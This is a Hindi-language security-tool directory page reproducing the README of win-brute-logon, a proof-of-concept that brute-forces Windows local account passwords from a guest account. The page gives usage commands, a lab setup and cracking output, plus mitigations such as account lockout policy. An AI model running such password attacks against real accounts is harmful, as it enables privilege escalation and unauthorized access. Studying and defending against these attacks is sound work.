Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
win-brute-logon — बिना किसी विशेषाधिकार के किसी भी Microsoft Windows उपयोगकर्ता का पासवर्ड क्रैक करें (Guest खाता शामिल है) | Kitploit
उपकरण/GitHubGitHub/darkcodersc/win-brute-logon
पासवर्ड क्रैकिंगविशेषाधिकार वृद्धिपासवर्ड हमलेशोषणपेनिट्रेशन टेस्टिंग
GitHubdarkcodersc/win-brute-logon

win-brute-logon

बिना किसी विशेषाधिकार के किसी भी Microsoft Windows उपयोगकर्ता का पासवर्ड क्रैक करें (Guest खाता शामिल है)

रिपॉजिटरी देखें
1.2k187132 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

सूचना 1: हमें यह घोषणा करते हुए खुशी हो रही है कि हमारे वर्तमान टूल को PowerShell संस्करण में पोर्ट किया गया है। इसका मतलब है कि उपयोगकर्ता अब PowerShell कमांड लाइन से सीधे टूल तक पहुँच सकते हैं और उसका उपयोग कर सकते हैं, जिससे यह और भी अधिक सुविधाजनक और कुशल हो जाता है। हमारा मानना है कि यह नया संस्करण हमारे उपयोगकर्ताओं को बहुत लाभ पहुँचाएगा और टूल के साथ उनके अनुभव को बढ़ाएगा। आपके निरंतर समर्थन के लिए धन्यवाद, और हमें उम्मीद है कि आप नए PowerShell संस्करण का आनंद लेंगे: https://github.com/DarkCoderSc/power-brute-logon

सूचना 2: हमें हाल ही में पता चला है कि Microsoft ने आधुनिक और अद्यतित संस्करणों Windows में डिफ़ॉल्ट रूप से खाता लॉकडाउन नीति (account lockdown policy) सक्षम कर दी है। यह नीति एक निश्चित संख्या में असफल लॉगिन प्रयासों के बाद खाते को लॉक करके सिस्टम को सुरक्षित करने में मदद करती है। यह एक लाभकारी सुरक्षा उपाय होते हुए भी, यह प्रूफ-ऑफ-कॉन्सेप्ट (PoC) को इन सिस्टमों पर अप्रभावी बना देता है।

विन ब्रूट लॉगऑन (प्रूफ ऑफ कॉन्सेप्ट)

रिलीज़ तिथि: 2020-05-14

लक्ष्य: Windows XP से नवीनतम Windows 10 संस्करण (1909)

Console

कमज़ोरी का स्थान: LogonUserA, LogonUserW, CreateProcessWithLogonA, CreateProcessWithLogonW

उपयोग

Wordlist फ़ाइल

WinBruteLogon.exe -u <username> -w <wordlist_file>

Stdin Wordlist

type <wordlist_file> | WinBruteLogon.exe -u <username> -

परिचय

विन ब्रूट लॉगऑन को कम समय में बड़ी संख्या में पासवर्ड संयोजनों का अनुमान लगाकर Microsoft खाते पर ब्रूट-फ़ोर्स हमले का अनुकरण करने के लिए डिज़ाइन किया गया है। यह पेन्टेस्टर्स को अपने सिस्टम की सुरक्षा स्थिति का परीक्षण करने और ब्रूट-फ़ोर्स हमलों के खिलाफ अपनी सुरक्षा का आकलन करने की अनुमति देता है। यह उपकरण खाता लॉकआउट तंत्र की कमी का शोषण करता है, जो कई सिस्टमों में एक सामान्य कमज़ोरी है (Windows 11 पर डिफ़ॉल्ट रूप से खाता लॉकआउट सक्षम होने से पहले)। किसी खाते का पासवर्ड अनुमान लगाने का प्रयास करके, उपकरण पेन्टेस्टर्स को अपने सुरक्षा उपायों में कमज़ोरियों की पहचान करने और उन्हें दूर करने में मदद कर सकता है। इसका उपयोग जिम्मेदारी से और कानून की सीमाओं के भीतर किया जाना चाहिए।

PoC परीक्षण परिदृश्य (अतिथि खाते के साथ)

इस प्रदर्शन के लिए, हम एक वर्चुअल या भौतिक मशीन पर Windows 10 का एक नया संस्करण स्थापित करेंगे। मशीन सेट अप होने के बाद, एक व्यवस्थापक के रूप में लॉग इन करें। इसके बाद, दो अलग-अलग स्थानीय खाते बनाएँ: एक व्यवस्थापक खाता और एक सामान्य उपयोगकर्ता खाता। कृपया ध्यान दें कि हालाँकि हम डेमो के लिए अतिथि खाते का उपयोग करेंगे, यह प्रूफ-ऑफ-कॉन्सेप्ट (PoC) अतिथि खाते तक सीमित नहीं है। इसका उपयोग किसी भी खाते या समूह से किया जा सकता है, जिसमें अतिथि, सामान्य उपयोगकर्ता और व्यवस्थापक उपयोगकर्ता शामिल हैं।

एक नया व्यवस्थापक उपयोगकर्ता बनाएँ

net user darkcodersc /add

net user darkcodersc trousers (trousers पासवर्ड है)

net localgroup administrators darkcodersc /add

एक सामान्य उपयोगकर्ता बनाएँ

net user HackMe /add

net user HackMe ozlq6qwm (ozlq6qwm पासवर्ड है)

एक नया अतिथि खाता बनाएँ

net user GuestUser /add

net localgroup users GuestUser /delete

net localgroup guests GuestUser /add

एक Wordlist प्राप्त करें

मेरे मामले में, trousers और ozlq6qwm दोनों SecList में हैं: https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/10k-most-common.txt

हमला शुरू करें

प्रदर्शन शुरू करने के लिए, व्यवस्थापक खाते से लॉग ऑफ करें या मशीन को रीस्टार्ट करें और अतिथि खाते में लॉग इन करें। फिर, PoC एक्जीक्यूटेबल को ऐसे स्थान पर रखें जहाँ आप अतिथि उपयोगकर्ता के रूप में पहुँच प्राप्त कर सकें।

उपयोग: WinBruteLogon.exe -v -u <username> -w <wordlist_file>

-v वैकल्पिक है, यह वर्बोज़ मोड को दर्शाता है।

डिफ़ॉल्ट रूप से, डोमेन नाम %USERDOMAIN% env var द्वारा निर्दिष्ट मान है। आप -d विकल्प से एक कस्टम नाम निर्दिष्ट कर सकते हैं।

पहला उपयोगकर्ता क्रैक करें: darkcodersc (व्यवस्थापक)

प्रॉम्प्ट(अतिथि)>WinBruteLogon.exe -v -u darkcodersc -w 10k-most-common.txt

परिणाम देखने के लिए कुछ सेकंड प्रतीक्षा करें:

[ .. ] Load 10k-most-common.txt file in memory...
[DONE] 10002 passwords successfully loaded.
[INFO] 2 cores are available
[ .. ] Create 2 threads...
[INFO] New "TWorker" Thread created with id=2260, handle=364
[INFO] New "TWorker" Thread created with id=3712, handle=532
[DONE] Done.
[ OK ] Password for username=[darkcodersc] and domain=[DESKTOP-0885FP1] found = [trousers]
[ .. ] Finalize and close worker threads...
[INFO] "TWorkers"(id=2260, handle=364) Thread successfully terminated.
[INFO] "TWorkers"(id=3712, handle=532) Thread successfully terminated.
[DONE] Done.
[INFO] Ellapsed Time : 00:00:06

दूसरा उपयोगकर्ता क्रैक करें: HackMe (सामान्य उपयोगकर्ता)

प्रॉम्प्ट(अतिथि)>WinBruteLogon.exe -v -u HackMe -w 10k-most-common.txt

परिणाम देखने के लिए कुछ सेकंड प्रतीक्षा करें:

[ .. ] Load 10k-most-common.txt file in memory...
[DONE] 10002 passwords successfully loaded.
[INFO] 2 cores are available
[ .. ] Create 2 threads...
[INFO] New "TWorker" Thread created with id=5748, handle=336
[INFO] New "TWorker" Thread created with id=4948, handle=140
[DONE] Done.
[ OK ] Password for username=[HackMe] and domain=[DESKTOP-0885FP1] found = [ozlq6qwm]
[ .. ] Finalize and close worker threads...
[INFO] "TWorkers"(id=5748, handle=336) Thread successfully terminated.
[INFO] "TWorkers"(id=4948, handle=140) Thread successfully terminated.
[DONE] Done.
[INFO] Ellapsed Time : 00:00:06

वास्तविक दुनिया का परिदृश्य

"वास्तविक दुनिया के परिदृश्य में, यदि कोई हमलावर कम-विशेषाधिकार प्राप्त उपयोगकर्ता खाते तक पहुँच प्राप्त कर लेता है, तो वे अधिक विशेषाधिकार प्राप्त उपयोगकर्ता के पासवर्ड को क्रैक कर सकते हैं और अपने विशेषाधिकारों को बढ़ा सकते हैं। इस जोखिम को कम करने के लिए, कुछ कदम उठाए जा सकते हैं:

  • यदि मौजूद हो, तो किसी भी अतिथि खाते को अक्षम करें।
  • अनधिकृत सॉफ़्टवेयर के निष्पादन को प्रतिबंधित करने के लिए एप्लिकेशन व्हाइट-लिस्टिंग लागू करें।
  • सभी उपयोगकर्ताओं के लिए मजबूत पासवर्ड बनाने और बनाए रखने के दिशानिर्देशों का पालन करें।

सुरक्षा लॉकआउट नीति लागू करने के लिए (जो डिफ़ॉल्ट रूप से सक्षम नहीं है), इन चरणों का पालन करें:

  • 'secpol.msc' उपयोगिता खोलें।
  • 'खाता नीतियाँ' > 'खाता लॉकआउट नीति' पर जाएँ।
  • 'खाता लॉकआउट थ्रेशोल्ड' मान को इच्छित प्रयासों की संख्या (1 से 999) के साथ संपादित करें। यह मान खाते के लॉक होने से पहले असफल लॉगिन प्रयासों की संख्या दर्शाता है।

कृपया ध्यान दें कि लॉकआउट नीति व्यवस्थापक खाते पर लागू नहीं होती है। इस मामले में, व्यवस्थापक खाते (यदि सक्षम है) के लिए सबसे अच्छी सुरक्षा एक बहुत ही जटिल पासवर्ड सेट करना है।

इस कमज़ोरी की रिपोर्ट Microsoft सुरक्षा टीम को भेजी गई है। उन्हें खाता लॉकआउट नीति को डिफ़ॉल्ट रूप से सक्षम करने पर विचार करना चाहिए।"

(अपडेट 2022) : खाता लॉकआउट अंततः डिफ़ॉल्ट रूप से सक्षम किया गया।

टूल डाउनलोड करें